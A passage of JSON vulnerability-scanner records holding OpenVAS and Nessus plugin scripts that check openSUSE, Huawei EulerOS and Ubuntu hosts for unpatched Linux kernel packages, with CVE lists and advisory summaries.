res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"cloop-kmp-pae-debuginfo\", rpm:\"cloop-kmp-pae-debuginfo~2.639_k3.16.7_42~14.20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-kmp-pae\", rpm:\"crash-kmp-pae~7.0.8_k3.16.7_42~20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-kmp-pae-debuginfo\", rpm:\"crash-kmp-pae-debuginfo~7.0.8_k3.16.7_42~20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hdjmod-kmp-pae\", rpm:\"hdjmod-kmp-pae~1.28_k3.16.7_42~18.21.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hdjmod-kmp-pae-debuginfo\", rpm:\"hdjmod-kmp-pae-debuginfo~1.28_k3.16.7_42~18.21.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-kmp-pae\", rpm:\"ipset-kmp-pae~6.23_k3.16.7_42~20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-kmp-pae-debuginfo\", rpm:\"ipset-kmp-pae-debuginfo~6.23_k3.16.7_42~20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"pcfclock-kmp-pae\", rpm:\"pcfclock-kmp-pae~0.44_k3.16.7_42~260.20.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"pcfclock-kmp-pae-debuginfo\", rpm:\"pcfclock-kmp-pae-debuginfo~0.44_k3.16.7_42~260.20.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kmp-pae-\", rpm:\"vhba-kmp-pae~20140629_k3.16.7_42~2.20.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kmp-pae-debuginfo-\", rpm:\"vhba-kmp-pae-debuginfo~20140629_k3.16.7_42~2.20.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-kmp-pae\", rpm:\"virtualbox-guest-kmp-pae~5.0.20_k3.16.7_42~48.5\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-kmp-pae-debuginfo\", rpm:\"virtualbox-guest-kmp-pae-debuginfo~5.0.20_k3.16.7_42~48.5\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-host-kmp-pae\", rpm:\"virtualbox-host-kmp-pae~5.0.20_k3.16.7_42~48.5\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-host-kmp-pae-debuginfo\", rpm:\"virtualbox-host-kmp-pae-debuginfo~5.0.20_k3.16.7_42~48.5\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xtables-addons-kmp-pae\", rpm:\"xtables-addons-kmp-pae~2.6_k3.16.7_42~22.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xtables-addons-kmp-pae-debuginfo\", rpm:\"xtables-addons-kmp-pae-debuginfo~2.6_k3.16.7_42~22.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae\", rpm:\"kernel-pae~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-base\", rpm:\"kernel-pae-base~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-base-debuginfo\", rpm:\"kernel-pae-base-debuginfo~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-debuginfo\", rpm:\"kernel-pae-debuginfo~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-debugsource\", rpm:\"kernel-pae-debugsource~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-devel\", rpm:\"kernel-pae-devel~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-27T18:40:37", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2019-2353)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-15219", "CVE-2017-7472", "CVE-2019-14815", "CVE-2019-15098", "CVE-2016-2384", "CVE-2016-2782", "CVE-2018-3693", "CVE-2017-14051", "CVE-2019-15218", "CVE-2017-7261", "CVE-2019-14816", "CVE-2015-3332", "CVE-2017-13216", "CVE-2017-18595", "CVE-2018-10880", "CVE-2019-15217", "CVE-2019-0136", "CVE-2019-17666", "CVE-2019-14284", "CVE-2019-15807", "CVE-2016-3689", "CVE-2019-15216", "CVE-2019-15505", "CVE-2019-12378", "CVE-2019-17055", "CVE-2016-3139", "CVE-2015-9289", "CVE-2019-15118", "CVE-2017-18551", "CVE-2016-2186", "CVE-2019-13648", "CVE-2019-17054", "CVE-2014-1446", "CVE-2016-2187", "CVE-2018-10675", "CVE-2019-13631", "CVE-2019-15220", "CVE-2016-4569", "CVE-2016-7425", "CVE-2017-13305", "CVE-2017-1000379", "CVE-2016-2184", "CVE-2019-17075", "CVE-2019-15927", "CVE-2017-18232", "CVE-2019-10140", "CVE-2019-12381", "CVE-2018-18710", "CVE-2019-12379", "CVE-2019-14835", "CVE-2019-15213", "CVE-2019-9503", "CVE-2015-1350", "CVE-2019-15212", "CVE-2019-12456", "CVE-2019-15221", "CVE-2018-10322", "CVE-2018-20856", "CVE-2019-12818", "CVE-2018-17972", "CVE-2019-10142", "CVE-2016-3138", "CVE-2018-10323", "CVE-2019-15292", "CVE-2016-3140", "CVE-2019-17052", "CVE-2018-20976", "CVE-2017-18509", "CVE-2016-4578", "CVE-2015-8816", "CVE-2019-15214", "CVE-2016-2185", "CVE-2018-9518", "CVE-2018-10087", "CVE-2019-16232", "CVE-2019-14821", "CVE-2019-3846", "CVE-2018-10124", "CVE-2019-2101", "CVE-2019-15916", "CVE-2016-4580", "CVE-2017-11089", "CVE-2019-15926", "CVE-2019-14814", "CVE-2018-6412", "CVE-2017-13167", "CVE-2019-15291", "CVE-2019-3882", "CVE-2019-17053", "CVE-2019-1125", "CVE-2018-12896", "CVE-2019-17133", "CVE-2019-16413", "CVE-2018-20511", "CVE-2019-17056", "CVE-2019-14283"], "modified": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220192353", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220192353", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.2353\");\n script_version(\"2020-01-23T14:09:13+0000\");\n script_cve_id(\"CVE-2014-1446\", \"CVE-2015-1350\", \"CVE-2015-3332\", \"CVE-2015-8816\", \"CVE-2015-9289\", \"CVE-2016-2184\", \"CVE-2016-2185\", \"CVE-2016-2186\", \"CVE-2016-2187\", \"CVE-2016-2384\", \"CVE-2016-2782\", \"CVE-2016-3138\", \"CVE-2016-3139\", \"CVE-2016-3140\", \"CVE-2016-3689\", \"CVE-2016-4569\", \"CVE-2016-4578\", \"CVE-2016-4580\", \"CVE-2016-7425\", \"CVE-2017-1000379\", \"CVE-2017-11089\", \"CVE-2017-13167\", \"CVE-2017-13216\", \"CVE-2017-13305\", \"CVE-2017-14051\", \"CVE-2017-18232\", \"CVE-2017-18509\", \"CVE-2017-18551\", \"CVE-2017-18595\", \"CVE-2017-7261\", \"CVE-2017-7472\", \"CVE-2018-10087\", \"CVE-2018-10124\", \"CVE-2018-10322\", \"CVE-2018-10323\", \"CVE-2018-10675\", \"CVE-2018-10880\", \"CVE-2018-12896\", \"CVE-2018-17972\", \"CVE-2018-18710\", \"CVE-2018-20511\", \"CVE-2018-20856\", \"CVE-2018-20976\", \"CVE-2018-3693\", \"CVE-2018-6412\", \"CVE-2018-9518\", \"CVE-2019-0136\", \"CVE-2019-10140\", \"CVE-2019-10142\", \"CVE-2019-1125\", \"CVE-2019-12378\", \"CVE-2019-12379\", \"CVE-2019-12381\", \"CVE-2019-12456\", \"CVE-2019-12818\", \"CVE-2019-13631\", \"CVE-2019-13648\", \"CVE-2019-14283\", \"CVE-2019-14284\", \"CVE-2019-14814\", \"CVE-2019-14815\", \"CVE-2019-14816\", \"CVE-2019-14821\", \"CVE-2019-14835\", \"CVE-2019-15098\", \"CVE-2019-15118\", \"CVE-2019-15212\", \"CVE-2019-15213\", \"CVE-2019-15214\", \"CVE-2019-15216\", \"CVE-2019-15217\", \"CVE-2019-15218\", \"CVE-2019-15219\", \"CVE-2019-15220\", \"CVE-2019-15221\", \"CVE-2019-15291\", \"CVE-2019-15292\", \"CVE-2019-15505\", \"CVE-2019-15807\", \"CVE-2019-15916\", \"CVE-2019-15926\", \"CVE-2019-15927\", \"CVE-2019-16232\", \"CVE-2019-16413\", \"CVE-2019-17052\", \"CVE-2019-17053\", \"CVE-2019-17054\", \"CVE-2019-17055\", \"CVE-2019-17056\", \"CVE-2019-17075\", \"CVE-2019-17133\", \"CVE-2019-17666\", \"CVE-2019-2101\", \"CVE-2019-3846\", \"CVE-2019-3882\", \"CVE-2019-9503\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 14:09:13 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 12:47:59 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2019-2353)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP2\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-2353\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-2353\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'kernel' package(s) announced via the EulerOS-SA-2019-2353 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The yam_ioctl function in drivers et/hamradio/yam.c in the Linux kernel before 3.12.8 does not initialize a certain structure member, which allows local users to obtain sensitive information from kernel memory by leveraging the CAP_NET_ADMIN capability for an SIOCYAMGCFG ioctl call.(CVE-2014-1446)\n\nThe VFS subsystem in the Linux kernel 3.x provides an incomplete set of requirements for setattr operations that underspecifies removing extended privilege attributes, which allows local users to cause a denial of service (capability stripping) via a failed invocation of a system call, as demonstrated by using chown to remove a capability from the ping or Wireshark dumpcap program.(CVE-2015-1350)\n\nA certain backport in the TCP Fast Open implementation for the Linux kernel before 3.18 does not properly maintain a count value, which allow local users to cause a denial of service (system crash) via the Fast Open feature, as demonstrated by visiting the chrome://flags/#enable-tcp-fast-open URL when using certain 3.10.x through 3.16.x kernel builds, including longterm-maintenance releases and ckt (aka Canonical Kernel Team) builds.(CVE-2015-3332)\n\nThe hub_activate function in drivers/usb/core/hub.c in the Linux kernel before 4.3.5 does not properly maintain a hub-interface data structure, which allows physically proximate attackers to cause a denial of service (invalid memory access and system crash) or possibly have unspecified other impact by unplugging a USB hub device.(CVE-2015-8816)\n\nIn the Linux kernel before 4.1.4, a buffer overflow occurs when checking userspace params in drivers/media/dvb-frontends/cx24116.c. The maximum size for a DiSEqC command is 6, according to the userspace API. However, the code allows larger values such as 23.(CVE-2015-9289)\n\nThe create_fixed_stream_quirk function in sound/usb/quirks.c in the snd-usb-audio driver in the Linux kernel before 4.5.1 allows physically proximate attackers to cause a denial of service (NULL pointer dereference or double free, and system crash) via a crafted endpoints value in a USB device descriptor.(CVE-2016-2184)\n\nThe ati_remote2_probe function in drivers/input/misc/ati_remote2.c in the Linux kernel before 4.5.1 allows physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) via a crafted endpoints value in a USB device descriptor.(CVE-2016-2185)\n\nThe powermate_probe function in drivers/input/misc/powermate.c in the Linux kernel before 4.5.1 allows physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) via a crafted endpoints value in a USB device ...\n\n Description truncated. Please see the references for more information.\");\n\n script_tag(name:\"affected\", value:\"'kernel' package(s) on Huawei EulerOS V2.0SP2.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP2\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~327.62.59.83.h195\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~3.10.0~327.62.59.83.h195\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~3.10.0~327.62.59.83.h195\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~3.10.0~327.62.59.83.h195\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo-common-x86_64\", rpm:\"kernel-debuginfo-common-x86_64~3.10.0~327.62.59.83.h195\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~327.62.59.83.h195\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~327.62.59.83.h195\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~327.62.59.83.h195\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~327.62.59.83.h195\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perf\", rpm:\"perf~3.10.0~327.62.59.83.h195\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~3.10.0~327.62.59.83.h195\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-11-25T14:35:44", "description": "Ben Hawkes discovered that the Linux netfilter implementation did not correctly perform validation when handling IPT_SO_SET_REPLACE events.\nA local unprivileged attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code with administrative privileges. (CVE-2016-3134)\n\nBen Hawkes discovered an integer overflow in the Linux netfilter implementation. On systems running 32 bit kernels, a local unprivileged attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code with administrative privileges. (CVE-2016-3135)\n\nRalf Spenneberg discovered that the USB driver for Clie devices in the Linux kernel did not properly sanity check the endpoints reported by the device. An attacker with physical access could cause a denial of service (system crash). (CVE-2015-7566)\n\nIt was discovered that a race condition existed when handling heartbeat- timeout events in the SCTP implementation of the Linux kernel. A remote attacker could use this to cause a denial of service.\n(CVE-2015-8767)\n\nIt was discovered that a race condition existed in the ioctl handler for the TTY driver in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or expose sensitive information. (CVE-2016-0723)\n\nAndrey Konovalov discovered that the ALSA USB MIDI driver incorrectly performed a double-free. A local attacker with physical access could use this to cause a denial of service (system crash) or possibly execute arbitrary code with administrative privileges. (CVE-2016-2384)\n\nRalf Spenneberg discovered that the USB driver for Treo devices in the Linux kernel did not properly sanity check the endpoints reported by the device. An attacker with physical access could cause a denial of service (system crash). (CVE-2016-2782).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-03-17T00:00:00", "type": "nessus", "title": "Ubuntu 15.10 : linux-raspi2 vulnerabilities (USN-2930-3)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7566", "CVE-2015-8767", "CVE-2016-0723", "CVE-2016-2384", "CVE-2016-2782", "CVE-2016-3134", "CVE-2016-3135"], "modified": "2023-01-17T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-raspi2", "cpe:/o:canonical:ubuntu_linux:15.10"], "id": "UBUNTU_USN-2930-3.NASL", "href": "https://www.tenable.com/plugins/nessus/89995", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2930-3. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89995);\n script_version(\"2.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/17\");\n\n script_cve_id(\"CVE-2015-7566\", \"CVE-2015-8767\", \"CVE-2016-0723\", \"CVE-2016-2384\", \"CVE-2016-2782\", \"CVE-2016-3134\", \"CVE-2016-3135\");\n script_xref(name:\"USN\", value:\"2930-3\");\n\n script_name(english:\"Ubuntu 15.10 : linux-raspi2 vulnerabilities (USN-2930-3)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Ben Hawkes discovered that the Linux netfilter implementation did not\ncorrectly perform validation when handling IPT_SO_SET_REPLACE events.\nA local unprivileged attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code with\nadministrative privileges. (CVE-2016-3134)\n\nBen Hawkes discovered an integer overflow in the Linux netfilter\nimplementation. On systems running 32 bit kernels, a local\nunprivileged attacker could use this to cause a denial of service\n(system crash) or possibly execute arbitrary code with administrative\nprivileges. (CVE-2016-3135)\n\nRalf Spenneberg discovered that the USB driver for Clie devices in the\nLinux kernel did not properly sanity check the endpoints reported by\nthe device. An attacker with physical access could cause a denial of\nservice (system crash). (CVE-2015-7566)\n\nIt was discovered that a race condition existed when handling\nheartbeat- timeout events in the SCTP implementation of the Linux\nkernel. A remote attacker could use this to cause a denial of service.\n(CVE-2015-8767)\n\nIt was discovered that a race condition existed in the ioctl handler\nfor the TTY driver in the Linux kernel. A local attacker could use\nthis to cause a denial of service (system crash) or expose sensitive\ninformation. (CVE-2016-0723)\n\nAndrey Konovalov discovered that the ALSA USB MIDI driver incorrectly\nperformed a double-free. A local attacker with physical access could\nuse this to cause a denial of service (system crash) or possibly\nexecute arbitrary code with administrative privileges. (CVE-2016-2384)\n\nRalf Spenneberg discovered that the USB driver for Treo devices in the\nLinux kernel did not properly sanity check the endpoints reported by\nthe device. An attacker with physical access could cause a denial of\nservice (system crash). (CVE-2016-2782).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2930-3/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected linux-image-4.2-raspi2 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-raspi2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:15.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2020 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(15\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 15.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2015-7566\", \"CVE-2015-8767\", \"CVE-2016-0723\", \"CVE-2016-2384\", \"CVE-2016-2782\", \"CVE-2016-3134\", \"CVE-2016-3135\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-2930-3\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"15.10\", pkgname:\"linux-image-4.2.0-1027-raspi2\", pkgver:\"4.2.0-1027.35\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.2-raspi2\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-25T14:36:11", "description": "Ben Hawkes discovered that the Linux netfilter implementation did not correctly perform validation when handling IPT_SO_SET_REPLACE events.\nA local unprivileged attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code with administrative privileges. (CVE-2016-3134)\n\nBen Hawkes discovered an integer overflow in the Linux netfilter implementation. On systems running 32 bit kernels, a local unprivileged attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code with administrative privileges. (CVE-2016-3135)\n\nRalf Spenneberg discovered that the USB driver for Clie devices in the Linux kernel did not properly sanity check the endpoints reported by the device. An attacker with physical access could cause a denial of service (system crash). (CVE-2015-7566)\n\nIt was discovered that a race condition existed when handling heartbeat- timeout events in the SCTP implementation of the Linux kernel. A remote attacker could use this to cause a denial of service.\n(CVE-2015-8767)\n\nIt was discovered that a race condition existed in the ioctl handler for the TTY driver in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or expose sensitive information. (CVE-2016-0723)\n\nAndrey Konovalov discovered that the ALSA USB MIDI driver incorrectly performed a double-free. A local attacker with physical access could use this to cause a denial of service (system crash) or possibly execute arbitrary code with administrative privileges. (CVE-2016-2384)\n\nRalf Spenneberg discovered that the USB driver for Treo devices in the Linux kernel did not properly sanity check the endpoints reported by the device. An attacker with physical access could cause a denial of service (system crash). (CVE-2016-2782).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-03-15T00:00:00", "type": "nessus", "title": "Ubuntu 15.10 : linux vulnerabilities (USN-2930-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7566", "CVE-2015-8767", "CVE-2016-0723", "CVE-2016-2384", "CVE-2016-2782", "CVE-2016-3134", "CVE-2016-3135"], "modified": "2023-01-17T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-lowlatency", "cpe:/o:canonical:ubuntu_linux:15.10"], "id": "UBUNTU_USN-2930-1.NASL", "href": "https://www.tenable.com/plugins/nessus/89934", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2930-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89934);\n script_version(\"2.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/17\");\n\n script_cve_id(\"CVE-2015-7566\", \"CVE-2015-8767\", \"CVE-2016-0723\", \"CVE-2016-2384\", \"CVE-2016-2782\", \"CVE-2016-3134\", \"CVE-2016-3135\");\n script_xref(name:\"USN\", value:\"2930-1\");\n\n script_name(english:\"Ubuntu 15.10 : linux vulnerabilities (USN-2930-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Ben Hawkes discovered that the Linux netfilter implementation did not\ncorrectly perform validation when handling IPT_SO_SET_REPLACE events.\nA local unprivileged attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code 